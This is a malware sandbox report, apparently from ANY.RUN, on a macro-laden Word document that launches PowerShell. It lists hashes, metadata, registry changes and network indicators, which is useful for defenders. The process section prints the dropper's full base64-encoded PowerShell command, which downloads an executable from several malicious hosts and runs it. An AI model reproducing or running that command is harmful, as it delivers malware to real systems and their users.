analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

http://buonbantenmien.com/3/JWRWSGF6549672/Scan/RECH/

Full analysis: https://app.any.run/tasks/e9d66036-f982-4027-b209-4eeb883790f7
Verdict: Malicious activity
Analysis date: February 18, 2019, 12:02:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 08:21:00 2019, Last Saved Time/Date: Mon Feb 18 08:21:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0
MD5:

37E5860FC8F6004BEDCEAF8E0B14C961

SHA1:

EA34C2DAC1D7BD49E4DE33203AEB47F322565C90

SHA256:

57759D00713BE2F0231595B5EB6AFBE268895F7E0C9DE5130C357B5F5F4621BF

SSDEEP:

6144:zG5/BnVfRFJ7KK9aHScdX9znGU431T/e7HJ8biTTCXhcKBMB:z2n9R/lA5dX9znGU2C7p8biaxcKBMB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • poWersheLl.exe (PID: 2896)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2984)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2984)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 9
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 9
Words: 1
Pages: 1
ModifyDate: 2019:02:18 08:21:00
CreateDate: 2019:02:18 08:21:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2984"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\RECH.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2896poWersheLl -e JABGADIAXwBfAF8AMgA9ACgAJwB1ADcANgAnACsAJwA4ACcAKwAnADcANgAnACkAOwAkAGgAXwBfAF8ANQA4ADIANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWADYAXwBfADUAMAAyAD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AbQAnACsAJwBhAHMAagBpAGQAJwArACcAcwBvAGwAJwArACcAYQByACcAKwAnAC4AbgBsAC8AeABNAFAAbgA2ACcAKwAnAFAANABTAFcAYwBfACcAKwAnAE4AbwByADQAJwArACcAagBqAGoAQgBnACcAKwAnAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwB6AG8AJwArACcAbABvAHQAJwArACcAbwB5ACcAKwAnAGsAbAB1ACcAKwAnAGMAJwArACcAaAA2ADkALgAnACsAJwByAHUALwBiAHoAZABEAEoAJwArACcAaABzAFoAUABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AbQAnACsAJwBhAHMAawAnACsAJwAuAHMAJwArACcAdAB1AGQAaQBvAC8ASwB2ACcAKwAnADAAeQB4ACcAKwAnAGsAJwArACcAeQBRACcAKwAnADMANABAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwBhAGwAZQBzAHcAbwByAGsALgAnACsAJwBuACcAKwAnAGwALwBIACcAKwAnAGIANAA4AGEAJwArACcASAB5ACcAKwAnADkAVgBuAEEAeQA4AEAAaAAnACsAJwB0AHQAcAA6AC8ALwBjAGwAYQBzAGgAbwBmAGMAJwArACcAbAAnACsAJwBhAG4AJwArACcAcwAnACsAJwBnAGUAJwArACcAbQBzACcAKwAnAC4AJwArACcAbgBsACcAKwAnAC8AdwBlADAAdgAnACsAJwB6AGcAJwArACcAUgAnACsAJwBWAHIAQgBoAHQAXwBuADAAbQBzAGkAWgBYAEoAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQASgBfAF8AMwA3ADUAXwA1AD0AKAAnAGkAJwArACcANwAzADUAOABfACcAKQA7ACQAdwA2AF8AMwA0ADgAXwA3ACAAPQAgACgAJwA1ADQAJwArACcAMAAnACkAOwAkAGsAMQA2ADcANQBfADIAPQAoACcAVgAnACsAJwA2AF8AOQBfADcAJwApADsAJAByAF8AMwA3ADcAXwA1AF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcANgBfADMANAA4AF8ANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMAA3AF8ANQA2AF8AIABpAG4AIAAkAFYANgBfAF8ANQAwADIAKQB7AHQAcgB5AHsAJABoAF8AXwBfADUAOAAyADQALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAYwAwADcAXwA1ADYAXwAsACAAJAByAF8AMwA3ADcAXwA1AF8AKQA7ACQAYwAyAF8AXwAzADkAMwBfAD0AKAAnAEIAOABfADgAJwArACcAXwBfAF8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcgBfADMANwA3AF8ANQBfACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBfADMANwA3AF8ANQBfADsAJABvADcAOQA2ADUANAA5AF8APQAoACcAQQAwAF8AJwArACcAXwAnACsAJwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHIANwA3ADQAXwBfADUAMgA9ACgAJwB0ADYAMwAnACsAJwBfADEAMAA5ACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\poWersheLl.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 388
Read events
992
Write events
391
Delete events
5

Modification events

(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:.2,
Value:
2E322C00A80B0000010000000000000000000000
(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2984) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1313996823
(PID) Process:(2984) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313996944
(PID) Process:(2984) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313996945
(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
A80B0000387C86EB81C7D40100000000
(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:73,
Value:
37332C00A80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:73,
Value:
37332C00A80B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2984) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE62E.tmp.cvr
MD5:
SHA256:
2896poWersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FOA9OWNDDPILW07WW5TU.temp
MD5:
SHA256:
2984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$RECH.docpgc
MD5:D952ED3D21F6B0B2615D6C3ECA894D14
SHA256:271148695849FD0FFDC6134A1BD6EE061D1609B09000ECE122C1AF6163ACB2A1
2984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D8FD8B8FAC0DBDE7F68D50F5FC3BAA32
SHA256:4B94FC7B43771EB8BEA914AFF6A56E0164499257C8CC334774EC155AAD143E4A
2896poWersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2896poWersheLl.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ef84.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2896
poWersheLl.exe
GET
185.182.56.155:80
http://masjidsolar.nl/xMPn6P4SWc_Nor4jjjBg
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2896
poWersheLl.exe
185.182.56.155:80
masjidsolar.nl
Astralus B.V.
NL
malicious

DNS requests

Domain
IP
Reputation
masjidsolar.nl
  • 185.182.56.155
malicious

Threats

No threats detected
No debug info